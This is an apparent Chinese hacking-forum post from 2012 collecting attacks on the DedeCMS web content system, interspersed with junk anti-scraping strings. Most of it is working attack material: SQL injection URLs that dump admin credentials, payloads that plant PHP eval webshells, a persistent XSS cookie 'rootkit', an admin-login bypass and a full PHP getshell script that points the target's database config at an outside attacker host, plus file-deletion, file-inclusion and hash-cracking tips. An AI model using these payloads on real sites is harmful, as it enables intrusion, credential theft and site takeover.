找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3190|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ R- n- H" Y+ q  v5 }, i. F& O( LDedecms 5.6 rss注入漏洞
$ ]: Y! Y4 [# ~5 Y# b+ C$ s- o( v
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=15 k) [& e+ P4 [$ G/ k* X/ }! R9 V, F

; h: K2 b* ~* u% C
- Q5 p8 ]0 K" G$ j% ^- J- Z
- n3 b% b- R& T  S) y
7 `! b; n; L7 v' t' W
$ b5 K! X- K- A! a# p; t& g' T' K, A  N6 |7 E- @  ^3 U

* G: `! b3 P& I- m
  k# L5 I6 m/ \) B, R% ODedeCms v5.6 嵌入恶意代码执行漏洞
) ], Z( v5 s  w( t注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}/ V% s) H- A$ H) R  r5 s$ W' X9 U) S# W$ k
发表后查看或修改即可执行
' _) R- G" b7 e" {* z# M5 i6 la{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
* D, |. q; \8 y5 K生成x.php 密码xiao,直接生成一句话。
2 t3 l, V! M" L
" V0 }# C' B: e, Z7 U7 k6 `4 p8 u( y$ ^3 |, }& t! D
, @+ a! t# f% Q/ U2 ]& s  x, y6 Q
+ w0 l( B6 b1 w2 a% L: C% H
$ S" i' {. K0 {0 m. P

3 t5 \& n, g8 B9 f% T& v! L6 |
, G7 x4 @1 H  r5 Q; r  ?1 A% ^7 y& B
Dede 5.6 GBK SQL注入漏洞- j/ U& ?; Q& l/ _" k
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
0 @. I! J& O  V9 G
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
+ l% U* @% N- q4 n2 _0 P. e$ T& Uhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A76 D. M/ \6 L% S" {* v7 N

1 _+ {, U2 i) o! e8 o6 G2 M& U( q/ _: `9 n# o; L& V
, H8 H2 Z# Z4 o1 [; J$ ^
6 {9 s+ F( w" B8 Z

2 `! b: Z+ ^% u) b2 b' d
' v5 @0 G# m% i& S2 Z: T( j. a
6 L/ G4 ^( d7 r+ B# L" @& v( f8 V' {0 ]) o
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! j6 Q; U/ |3 h! R& r4 q" R+ L5 r
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 0 [0 x, N' `: [* n5 K% `

2 ~) F9 S8 k& ^: j
( E  F2 a4 r$ s* m. \( S9 F- ], F6 p9 i: @0 d  D
+ b9 e3 H$ w. I# o& D% _6 P

  K$ [: L: O% o' e% k0 Y0 Y4 L  s! D' J5 R4 J% Q- O3 r
DEDECMS 全版本 gotopage变量XSS漏洞. G4 M3 a1 e. z- v4 T; v, O& O
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
- f( q7 u& H$ ~: U6 K/ a5 ^3 _3 _
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
0 P' F+ x: ~( g
7 W( S) s4 H) H1 B5 a
0 V1 i  K; r1 `* o# }; L$ [: |2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 8 D- h- u5 g9 j5 [) m
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
# f7 ^1 ?' ^8 i* g4 H7 R$ T( q, Z* v
* \9 K2 T2 O3 K2 ~
http://v57.demo.dedecms.com/dede/login.php
5 X6 u; B7 r7 p8 ~; B. Q1 f, h5 @1 \" Y3 s0 Q# d& m
( E9 g5 g% M/ R) E+ E( p4 B! i
color=Red]DeDeCMS(织梦)变量覆盖getshell
* K) n$ G3 M$ ]9 @" {+ [#!usr/bin/php -w" y$ V  U9 h: `) d- C/ d
<?php: P. {1 H/ q/ B# t" s5 H. G9 i
error_reporting(E_ERROR);1 U/ t6 j' N) M) y. F. m
set_time_limit(0);8 N  I5 G: T6 I8 j& V. U9 g  t
print_r('
0 Y8 `" F0 M2 f& G4 x. R( v9 w& x8 pDEDEcms Variable Coverage% T, O9 I* L: K) j- T1 b$ c
Exploit Author:
www.heixiaozi.comwww.webvul.com  T4 M: l+ X; i/ u/ c: v  ~
);
8 h7 ?( N. `- W% zecho "\r\n";! B1 k) h' Y4 r8 N: E# M' o+ w
if($argv[2]==null){
0 l# l8 n$ Z1 m3 @8 B' s4 @, vprint_r('- k# y$ O: b  y" C5 ?" r/ T; j/ J
+---------------------------------------------------------------------------+2 m& L8 |/ G0 b$ ~0 J1 r
Usage: php '.$argv[0].' url aid path2 B+ A' b1 U" C& c: d
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
/ k9 U+ B: c8 v2 _8 w5 O: W/ C; r$ U# [Example:- [8 _" c  c) T3 m
php '.$argv[0].'
www.site.com 1 old
2 \' ?7 f5 x/ n8 `/ h  j+---------------------------------------------------------------------------+
3 G. J/ c# k/ `- N7 O% \# b/ H');2 M7 m" \7 r8 j) c0 b
exit;6 M9 u$ y9 ]; M" T
}
  y+ p1 B' F9 @. ^% W/ M3 f! n$url=$argv[1];
4 a+ z' j* Y9 V) O$aid=$argv[2];
# [, N3 ]. ~2 L! i' P! T& _$path=$argv[3];0 i0 t+ n& C4 _& }( F# |
$exp=Getshell($url,$aid,$path);
8 @$ Q6 l$ h5 _8 v- bif (strpos($exp,"OK")>12){! k0 M; K0 ^6 C) w- {3 x
echo "
2 W+ o8 v# `* ^8 pExploit Success \n";
! K8 |4 p# q' z8 j3 ]5 Rif($aid==1)echo "' t6 S- n6 R3 f" T; f7 m& s
Shell:".$url."/$path/data/cache/fuck.php\n" ;
3 |5 l  N; n9 ]( s- V; Q% ^' c, I+ r  N/ k

/ ~" ?4 m/ H5 X5 L1 b# E& _: xif($aid==2)echo "
7 J* H. T  B) m" h2 R. c* \Shell:".$url."/$path/fuck.php\n" ;& C3 |, g( W% J' S1 r0 y1 [0 A' t
4 n" `& ?: W6 |& ]) Y
% I; ~$ b( C1 g; l% @
if($aid==3)echo "
9 J! T+ Y( `' ?, O- Z! ?* OShell:".$url."/$path/plus/fuck.php\n";9 g$ b1 v& E: u! R
1 ~' W  E/ ^* O7 N. o
. o, w7 C" ^- C: d( @# l3 @+ U
}else{) A) a$ F. V! a; G
echo "
! k- d8 v2 j' cExploit Failed \n";" G8 w+ ~0 S9 ]' y
}
/ m+ E" |  m, T# S1 _: Efunction Getshell($url,$aid,$path){( {0 h. E, [  n4 u4 K- g
$id=$aid;: L$ r, Y( T2 c/ J
$host=$url;6 V* n. c2 J. h. e0 r; u0 ]
$port="80";' _- D/ t; S2 ]+ W4 E2 i2 H
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";, J7 A. _0 w- u. u
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
: P" U/ l. o, @, ]. b0 U$data .= "Host: ".$host."\r\n";; l* R  @. m/ u/ C6 R
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";3 y6 z0 S' N2 M, J
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";% o! [: e# T* W; L. i* q" o3 A
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";; R1 c1 h; e1 ~5 r" Y- \) _+ ~- ~
//$data .= "Accept-Encoding: gzip,deflate\r\n";1 i# ?& Y( h5 t0 p" k/ i, m5 @* x
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";. ^# P( M0 I4 g/ t+ v
$data .= "Connection: keep-alive\r\n";* w8 k$ t. P: A, |/ d0 L
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";  Y" Z3 U0 {* o9 y
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";4 j- x1 U+ Y1 G& m6 v+ I% [3 M
$data .= $content."\r\n";
- i+ m6 l& j$ y: B0 o% V% |$ t$ock=fsockopen($host,$port);
: {# i# M0 k9 h9 tif (!$ock) {
6 ~2 d# F( ?2 c0 Cecho "
5 i- X$ r( x+ xNo response from ".$host."\n";/ o5 Q! L* }) s$ E) l7 A
}
$ {' s, [- _9 B  p  tfwrite($ock,$data);+ i  J* e1 l3 W: Q# y, e" E: d
while (!feof($ock)) {
+ i& X# i8 U9 c! K3 V$exp=fgets($ock, 1024);
2 R* ]  V# v$ T0 P+ c: p  Xreturn $exp;
. U1 x6 j5 _4 L( Z. @# x* K4 j/ v}9 a* _* \+ t: x/ ~" h+ R
}* e) R0 f# A% |" r, d+ a3 G0 B( ?( M3 ]

) b$ [2 e9 Z7 K' w: l
$ J7 j6 H8 X# S/ _9 p3 A' Y% j?>
- t* F/ |3 l4 T1 ~2 t) I& P' q7 S- `$ \0 O
3 \  X2 W  g' u! C5 I# P

% w5 Q( g# G6 w) c: w* P. s
/ r0 q" s' B- [
2 l$ y+ H) }4 i1 n* p- I
7 N) w5 A3 N# n1 Q" B) Y0 s' H) ]( i) i9 o; a, @5 d8 e/ G+ M
; U& ^+ q0 Y4 Q8 w& ~' |0 h' Y
9 o" }% i( O' A% F! A

- D  {# D- F& L" m6 u/ uDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
' W, L) F0 O: ^& r7 x' N
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
9 C' }" Q3 ]4 e. g1 O
. x* n) d$ M4 p& O0 D2 V) c3 o
' O6 n1 _! K9 }  b, r) O: g把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ N, e# i8 z: S# r; \

2 x1 m$ ?/ |1 l7 t5 z, c& d7 B& p, t. V
此漏洞的前提是必须得到后台路径才能实现
1 e! \- a6 Y% @; r1 A+ W: W7 u- g' H) M8 N, ~7 X# w) h* i
$ P, U+ O# g' W6 H, z$ ]
6 R- C( c+ R3 D, A

+ d! p# d' N1 n( h% m6 H8 W2 T/ Q7 x8 b! r8 w* L' a, j/ M- |. I

9 g5 f% {. g3 N. ^# l4 J8 D* z( y' k# ~+ G/ h& x  x

) y6 ~% C8 X- Y- R" ^( D+ Z* u4 j. B2 n  z( v6 e4 [0 P, ]

7 b; U3 e; Z4 ]7 r: B6 v8 uDedecms织梦 标签远程文件写入漏洞
8 @! D& u( g' J; t0 y前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
/ a& c" s- {2 s' d2 o! C, z; _) R- N+ T. d6 b
5 q/ t" p; @4 q3 L' W
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 3 c" f5 ]$ y0 {+ [1 X
<form action="" method="post" name="QuickSearch" id="QuickSearch">+ K! H2 r4 E# {  |! m8 m# L  W
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># t- k6 s! a4 D, h( \
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
4 D0 U+ y4 o. f  P3 j<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
4 n: i* z+ y) [$ R9 C# ?<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />& [' l9 g% a. o' u# d8 I
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 V2 w6 ^, _7 E$ {- ?& ?+ l& D
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
$ K' i0 h  n8 R<input type="text" value="true" name="nocache" style="width:400">
5 S4 O# l" g5 Y) n<input type="submit" value="提交" name="QuickSearchBtn"><br />( E+ P  [. `2 j  `
</form>
' S! w2 V1 y( k( K<script>
# ~8 `3 U# [. s. p6 yfunction addaction()
# \! Q8 ~: L! E' ~0 F+ f0 w{, i" @& U. |: r) j( }+ s& a7 @
document.QuickSearch.action=document.QuickSearch.doaction.value;
8 R$ [& j8 x  t}
7 ^) D  N, u, I* `2 ?</script>; O( N0 g/ w. @. z: Z) R! g

0 i3 Q% U; P& k! C! E
/ w8 `5 J# d. }$ J( _) V7 J5 o6 i5 \; b, q' t2 I1 k5 W7 g

! V2 I9 `8 R. Z3 K* d4 N4 F- N2 K( }$ P1 @: \
# k& h$ i& H# I& a8 M- h5 p
# ~# N* a. z5 C6 m3 l
/ v( z% g  M6 E9 D* N6 _
* [3 Z4 c% N, q( U

+ q9 D2 l9 _# M. c$ n" wDedeCms v5.6 嵌入恶意代码执行漏洞2 A: m  y: X- D8 h! E
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行8 Z; n1 N/ b# ?. Y, v" V1 ]
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}; n0 v6 i0 s$ f% e9 z/ ~+ V/ y' P" _; F
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
' [, s2 @! `1 y2 o* J1 qDedecms <= V5.6 Final模板执行漏洞5 d! V8 S  h  @, Y9 N# o/ z
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:  I/ M$ p7 Y3 F$ F
uploads/userup/2/12OMX04-15A.jpg- t, ~, s8 {9 |3 ?* O
: y1 P# [/ f7 U8 {
: f7 i& C! k! B
模板内容是(如果限制图片格式,加gif89a):
0 ~" v- g3 y# }6 n- W& Z$ U{dede:name runphp='yes'}
& ~9 {) Q- i+ h$ X/ x( O$fp = @fopen("1.php", 'a');
8 V/ d2 x7 L& Q/ k$ _2 [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
; p: f# X# M; y2 @5 b. U@fclose($fp);* s" {3 L  u+ |% f% Q0 c
{/dede:name}7 l; l% ^4 G, O# e- {
2 修改刚刚发表的文章,查看源文件,构造一个表单:
2 Y( d1 P6 {; }<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
" E0 k9 h6 C1 ~<input type="hidden" name="dopost" value="save" />
2 k1 {  C, r, s8 [! D<input type="hidden" name="aid" value="2" />& ?* B' l1 @, D; o7 u
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
# ?. b7 B* b4 F1 e5 R  Y5 v<input type="hidden" name="channelid" value="1" />
) w; q- d) v& O* Q: p# J- o0 T, ~<input type="hidden" name="oldlitpic" value="" />
" L, r: h, D  ~7 t<input type="hidden" name="sortrank" value="1275972263" />% w& L4 k7 Z$ w% z/ J) x

1 w9 b! }. w$ h; U, S5 F
6 o9 \, b0 Z7 J" ?<div id="mainCp">
& a! U# X; D$ |" p<h3 class="meTitle"><strong>修改文章</strong></h3>
- @, p$ r; h; x: E7 C' f! m" ]. \% W# n

5 X9 G0 F! T, @1 S- L9 X# K' b) f<div class="postForm">
! h5 i% u! e9 B# p- P' k<label>标题:</label>+ q+ K, J0 ~0 U( a
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
4 o7 h1 i3 w; F# ^1 C& z: @# ]$ z5 e4 N

$ r. h) m! s5 n, L7 L3 x<label>标签TAG:</label>
' ~% M1 t5 F/ x5 w- L<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
+ {5 X+ b* ^( W/ l3 \' R3 E# g) Y) E1 q( T! M) {! A+ a& y
+ G  x' D7 \; q2 v0 ^
<label>作者:</label>% k" F" p  d0 d2 \: ~
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>6 S% b; P! q% @/ B0 R- O& @, h, @2 n

9 ]9 t6 D& m& V% X
8 D7 T$ i- I* z/ l1 @* K6 r<label>隶属栏目:</label>0 H: S& ~6 b# M& V! {
<select name='typeid' size='1'>
9 L5 m6 H% q/ |2 V4 ]: I' s1 G<option value='1' class='option3' selected=''>测试栏目</option>/ V7 D  v  i5 O$ s7 D1 R( y
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
: Z9 e/ ]' ]! `# p; W3 Z  O! ^; M, j

8 N+ n; S5 i( Y9 S/ ?<label>我的分类:</label>
% a! q6 _! v* t<select name='mtypesid' size='1'>
6 F- u: ^% `! N<option value='0' selected>请选择分类...</option>3 @+ J& u1 r5 Q/ \' y
<option value='1' class='option3' selected>hahahha</option>
6 I: R; ]" N* l; u/ v</select># b* X+ |% S, I

  j% s: W& ^, e+ z7 E: ~2 O( ]0 w6 ~  l
<label>信息摘要:</label>
1 d  [% M% D7 Y/ a8 U; j& j<textarea name="description" id="description">1111111</textarea>
" h+ @" c! n/ X* m(内容的简要说明)4 N  f; @$ u0 y1 X& I: e

2 b3 `' H$ c% F$ a8 O! y/ o7 p$ X  k0 Y. M
. H0 k1 J3 Z  V<label>缩略图:</label>
2 y# {% O- x- T" ~<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>& K, n5 F: W- H; J- g( Y
) H) w) j$ B" S! l1 M

( K+ e0 `7 {! _; x; d5 k<input type='text' name='templet'" i2 e, g3 b6 C: j& i5 q
value="../ uploads/userup/2/12OMX04-15A.jpg">
% F' ?# M, E, H" A5 P% Z) g' d<input type='text' name='dede_addonfields') |0 G0 {1 j5 S; Y9 F
value="templet,htmltext;">(这里构造)4 Q7 p1 Z5 ?# |3 Q
</div>
8 [! S) v) J0 g$ i5 v5 ^7 R7 L- [% o. d0 E. ~( O* q7 ^

3 ]  L" i4 m) A0 d* e6 n  F<!-- 表单操作区域 --># Z$ e1 G: j9 l6 ]2 I0 `7 l
<h3 class="meTitle">详细内容</h3>
! W) J# c- j0 U1 h* @5 O; @  j
& @0 a  U; x+ p( S  m; X* P7 H9 H9 b+ |2 u9 @! E, {
<div class="contentShow postForm">
5 n5 _3 m) M* E: U4 M# Q& y9 M, V<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
% i6 p  Z9 ?0 X$ J
  \% b  _1 s7 M7 ?/ t  ~5 i  ?' m- h, |& @; o) \
<label>验证码:</label>2 o9 e- |' v$ g, n
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
6 v6 [# n( ^/ l4 ^( E<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
2 F/ ^# W* P1 G7 ~- E7 E  i9 G* N. |
7 o; g+ A$ B# Q/ Y2 J' x
<button class="button2" type="submit">提交</button>
  Y1 S% X# ?" ]7 q' ^5 B' G# D<button class="button2 ml10" type="reset">重置</button>9 {1 S' M$ \6 n+ a3 s7 F2 [
</div>
9 P% g, r6 r" c7 Q% b$ k4 L4 H) A" Y) i# A

4 l! `# [' A/ k0 ^9 Y</div>5 b" I% V3 G* H$ p
6 R/ P0 R6 c3 L: v- \% `
, W5 k% X( e& N/ w& U, g
</form>
0 @4 ~7 j8 |! m% D% v* g- X8 V, @1 b2 \

: j4 a& ~8 b2 w# I提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:: R6 F) `, [3 M  y/ |0 d
假设刚刚修改的文章的aid为2,则我们只需要访问:
. B% i( C7 r! ?% `# G
http://127.0.0.1/dede/plus/view.php?aid=2
6 g) T$ ?0 L$ s即可以在plus目录下生成webshell:1.php0 l7 a, l  O% u
/ Q, \4 {1 R% ~

5 O4 d+ C) m5 A0 Q$ L5 y6 A
9 K) b! R+ k& a7 W+ z5 |* W% i9 m  K3 j3 |' Q
0 W) b. H) W2 u3 M# |
& g# G  r& R' f/ T! H

% l! j$ \( D8 S9 W$ v' s) M, ^6 }  W" d; P
# ^4 ~5 E! l1 ]; y
0 d9 I- R5 A# S
9 n1 M9 t, D& q* C) _8 k

  Y! C2 T" Z- jDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
5 ^# P/ E  x9 Y2 B' X, LGif89a{dede:field name='toby57' runphp='yes'}# p2 Y$ q9 W  @8 E9 W
phpinfo();
% M$ _9 W! y1 e! @: i9 B{/dede:field}
$ o7 l4 x8 r0 m7 j, e, X保存为1.gif; U. ~: S) R5 I1 G4 e7 Z3 h
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> * k5 o' \' `; j8 G
<input type="hidden" name="aid" value="7" />
9 C7 j$ @, u# B<input type="hidden" name="mediatype" value="1" /> . H( f7 D) ]/ \% E$ L& b3 r  c6 ?
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> & \. [8 c2 b- Z! W2 S8 k
<input type="hidden" name="dopost" value="save" /> ' N7 h9 f  J' d: \  B8 Q
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
! T+ J# T8 r$ j; ?& m' s  y+ H<input name="addonfile" type="file" id="addonfile"/> - t* z4 U" F, `8 c
<button class="button2" type="submit" >更改</button>
+ T* S% A* e& n* p6 ~. l  M% `</form> ) W* L( k' W. p4 D6 F  O3 ^/ p
: N/ \4 Y, r% t% q5 ]+ d
9 O% f2 q% h1 I1 {. @: p) p3 t
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif; d& u1 L9 X. M2 V
发表文章,然后构造修改表单如下:
( Q$ d# ^/ a7 l7 @5 e
( M. }4 t) M8 J5 h: V) j. o6 X. c( W' j, a5 R2 x. h- o
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
) `1 u5 S- w/ I2 W/ K<input type="hidden" name="dopost" value="save" />
, V6 N6 m+ g% \5 L- G<input type="hidden" name="aid" value="2" /> 4 _8 i6 {  o  w  ~- H! b# H* N/ _8 V
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 6 K0 R# H  C  |4 E
<input type="hidden" name="channelid" value="1" />   V, D# H8 E0 u: z! @$ y7 z5 M& Z/ i" q
<input type="hidden" name="oldlitpic" value="" /> 1 G/ j5 p6 R7 d- U: P
<input type="hidden" name="sortrank" value="1282049150" /> / z4 L: @" P/ R0 W( T7 S: W
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , O& X; M  o% \" m
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
4 ~/ q% o7 Y. u( ^( B' U7 r- _( ?( u; L6 M<select name='typeid' size='1'> # ]: Y) B& v9 N  @6 q
<option value='1' class='option3' selected=''>Test</option> / t1 x2 p0 k: `. _) y- ?8 a/ S/ `+ ^9 i
<select name='mtypesid' size='1'> 4 ?: p( E' u2 D4 t9 ^" m0 z
<option value='0' selected>请选择分类...</option> + r0 d! k( @* R. w
<option value='1' class='option3' selected>aa</option></select>
: B  l- i  P# N3 r6 [( s<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
2 d. O$ L; B( [  w3 o<input type='hidden' name='dede_addonfields' value="templet"> 0 [( j# R+ Y, g) \( C
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
, Y$ Y& a. g2 ~. l7 i! \  C2 m; v<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> * R8 S# k+ c! p! Z. [1 l1 m9 s
<button class="button2" type="submit">提交</button>
# f& s& X9 c) X5 d</form>0 g* p2 f+ Q- O, H7 i

/ |) p9 c3 v5 p* S" h
/ ~/ K5 t( y4 q6 S- q) [
1 S+ g- D. W7 p* V0 l7 E/ M% N# b/ _% R/ d

: n6 j0 D" _" U- u* Q7 f; }8 t' v' N' A+ _- O* f! v6 P* M
) w3 _' U' U$ q7 r0 D

' x6 m; P9 `; N* E5 F5 Z9 ?8 Q9 r
+ J3 P' _4 ?! r" ~$ n: C, M2 V0 m" @% S' B- m$ U: |. i  C1 a
+ Q# s: \+ ?! n& S8 O
; Z  }3 N2 I8 B& H% ~
织梦(Dedecms)V5.6 远程文件删除漏洞
& Q2 k* W- [2 v
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
% i0 u: g) \; }. R
2 I4 |5 n( u9 ?0 n3 R/ Z( A
  q4 n# i/ r; ^' i( L$ @
" {" c- y1 Y+ I, ~% i3 J$ u4 b1 c7 L# ?; J; E' t: R

! |3 r+ L+ t7 P+ y! R. k
4 q& f' q0 ]+ G4 {9 O$ S9 A+ Z7 M- n& I. i; J6 S7 |. h
1 w5 O2 C& h3 h: A8 w( y
  D9 q# b+ K5 d% j8 X, v3 Q

" K; t& ]& y- f: ]0 u+ O7 P9 y织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
( t7 G0 j! J. V4 w( a, b
http://www.test.com/plus/carbuya ... urn&code=../../
, S( t- r: C& D3 B# ^
: R: T" d2 m/ f4 V3 ?6 @( r) a# F0 S1 B4 B9 n; S8 |: _; x8 E) q
0 n$ e2 k+ B' h9 u1 v: m) V& @! l' k
" o  X9 g& J7 I$ z4 X3 p' k
* E% V) y7 ~2 ~' H- ^& X9 b2 j' D' Q

- X5 r0 C$ z* {4 u' M* O3 Z0 c0 T! h& g4 p. q
3 X" U# c8 G- K7 a. t

1 w: p2 l3 C$ q- G7 Y! h! I1 W: }
/ u. {! V4 v) {1 nDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 1 c( B3 j4 |. t2 T1 u
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`  p7 e# o- a; [, Q" f6 ^. k6 W5 p& c% k
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
; o1 P/ L; u& M8 S2 B/ [- {- Z6 x2 ~  ?% O$ ^: G
9 x7 E/ l+ g! w7 y( e

# M* k3 P8 C7 w  T! }$ Z  T: A& p7 y; `* a$ I7 P

( x- u( n1 Y5 _* s: F" {: g( {; J6 c9 L9 P2 W: o$ J% i

+ ]5 x2 U) K7 ^5 F$ Q+ ~
6 B1 w' j! K: T/ V2 y& b5 ~) E
4 U6 y% w( V( c+ z1 Q$ Q
. {+ E% _) @  G/ l" X织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
